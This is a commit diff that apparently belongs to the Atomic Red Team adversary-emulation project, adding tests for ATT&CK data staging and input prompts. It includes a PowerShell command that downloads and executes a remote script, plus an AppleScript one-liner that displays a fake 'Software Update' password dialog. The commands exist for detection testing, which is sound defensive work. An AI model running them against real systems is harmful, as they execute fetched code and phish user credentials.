Generate docs from job=validate_atomics_generate_docs branch=master

2019-05-21 12:09:28 +00:00
parent e4318e90f5
commit 2a40652162
7 changed files with 72 additions and 9 deletions
@@ -6,12 +6,27 @@ Interactive command shells may be used, and common functionality within [cmd](ht

 ## Atomic Tests

- [Atomic Test #1 - Stage data from Discovery.sh](#atomic-test-1---stage-data-from-discoverysh)
+- [Atomic Test #1 - Stage data from Discovery.bat](#atomic-test-1---stage-data-from-discoverybat)
+
+- [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)


 <br/>

-## Atomic Test #1 - Stage data from Discovery.sh
+## Atomic Test #1 - Stage data from Discovery.bat
+Utilize powershell to download discovery.bat and save to a local file
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `powershell`!
+```
+"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - Stage data from Discovery.sh
 Utilize curl to download discovery.sh and execute a basic information gathering shell script

 **Supported Platforms:** Linux, macOS
@@ -6,12 +6,28 @@ Adversaries may mimic this functionality to prompt users for credentials with a

 ## Atomic Tests

- [Atomic Test #1 - PowerShell - Prompt User for Password](#atomic-test-1---powershell---prompt-user-for-password)
+- [Atomic Test #1 - AppleScript - Prompt User for Password](#atomic-test-1---applescript---prompt-user-for-password)
+
+- [Atomic Test #2 - PowerShell - Prompt User for Password](#atomic-test-2---powershell---prompt-user-for-password)


 <br/>

-## Atomic Test #1 - PowerShell - Prompt User for Password
+## Atomic Test #1 - AppleScript - Prompt User for Password
+Prompt User for Password (Local Phishing)
+Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+
+**Supported Platforms:** macOS
+
+
+#### Run it with `sh`!
+```
+osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'
+```
+<br/>
+<br/>
+
+## Atomic Test #2 - PowerShell - Prompt User for Password
 Prompt User for Password (Local Phishing) as seen in Stitch RAT.

 Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
@@ -529,7 +529,8 @@
 - [T1056 Input Capture](./T1056/T1056.md)
  - Atomic Test #1: Input Capture [windows]
 - [T1141 Input Prompt](./T1141/T1141.md)
-  - Atomic Test #1: PowerShell - Prompt User for Password [windows]
+  - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1142 Keychain](./T1142/T1142.md)
  - Atomic Test #1: Keychain [macos]
@@ -693,7 +694,8 @@
  - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
  - Atomic Test #2: PowerShell [windows]
 - [T1074 Data Staged](./T1074/T1074.md)
-  - Atomic Test #1: Stage data from Discovery.sh [linux, macos]
+  - Atomic Test #1: Stage data from Discovery.bat [windows]
+  - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
  - Atomic Test #1: Search macOS Safari Cookies [macos]
@@ -15170,6 +15170,21 @@ credential-access:
      - User
      identifier: T1141
    atomic_tests:
+    - name: AppleScript - Prompt User for Password
+      description: |
+        Prompt User for Password (Local Phishing)
+        Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'osascript -e ''tell app "System Preferences" to activate'' -e ''tell
+          app "System Preferences" to activate'' -e ''tell app "System Preferences"
+          to display dialog "Software Update requires that you type your password
+          to apply changes." & return & return  default answer "" with icon 1 with
+          hidden answer with title "Software Update"''
+
+'
    - name: PowerShell - Prompt User for Password
      description: |
        Prompt User for Password (Local Phishing) as seen in Stitch RAT.
@@ -19554,6 +19569,19 @@ collection:
        Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
      identifier: T1074
    atomic_tests:
+    - name: Stage data from Discovery.bat
+      description: 'Utilize powershell to download discovery.bat and save to a local
+        file
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')"
+          > c:\windows\pi.log
+
+'
    - name: Stage data from Discovery.sh
      description: 'Utilize curl to download discovery.sh and execute a basic information
        gathering shell script
@@ -95,7 +95,7 @@
 - [T1119 Automated Collection](./T1119/T1119.md)
 - [T1115 Clipboard Data](./T1115/T1115.md)
 - [T1074 Data Staged](./T1074/T1074.md)
-  - Atomic Test #1: Stage data from Discovery.sh [linux, macos]
+  - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
 - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -145,7 +145,7 @@
 - [T1119 Automated Collection](./T1119/T1119.md)
 - [T1115 Clipboard Data](./T1115/T1115.md)
 - [T1074 Data Staged](./T1074/T1074.md)
-  - Atomic Test #1: Stage data from Discovery.sh [linux, macos]
+  - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
  - Atomic Test #1: Search macOS Safari Cookies [macos]
@@ -187,6 +187,7 @@
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056 Input Capture](./T1056/T1056.md)
 - [T1141 Input Prompt](./T1141/T1141.md)
+  - Atomic Test #1: AppleScript - Prompt User for Password [macos]
 - [T1142 Keychain](./T1142/T1142.md)
  - Atomic Test #1: Keychain [macos]
 - [T1040 Network Sniffing](./T1040/T1040.md)
@@ -360,7 +360,7 @@
 - [T1056 Input Capture](./T1056/T1056.md)
  - Atomic Test #1: Input Capture [windows]
 - [T1141 Input Prompt](./T1141/T1141.md)
-  - Atomic Test #1: PowerShell - Prompt User for Password [windows]
+  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - T1208 Kerberoasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1040 Network Sniffing](./T1040/T1040.md)
@@ -413,6 +413,7 @@
  - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
  - Atomic Test #2: PowerShell [windows]
 - [T1074 Data Staged](./T1074/T1074.md)
+  - Atomic Test #1: Stage data from Discovery.bat [windows]
 - T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1005 Data from Local System](./T1005/T1005.md)
 - T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)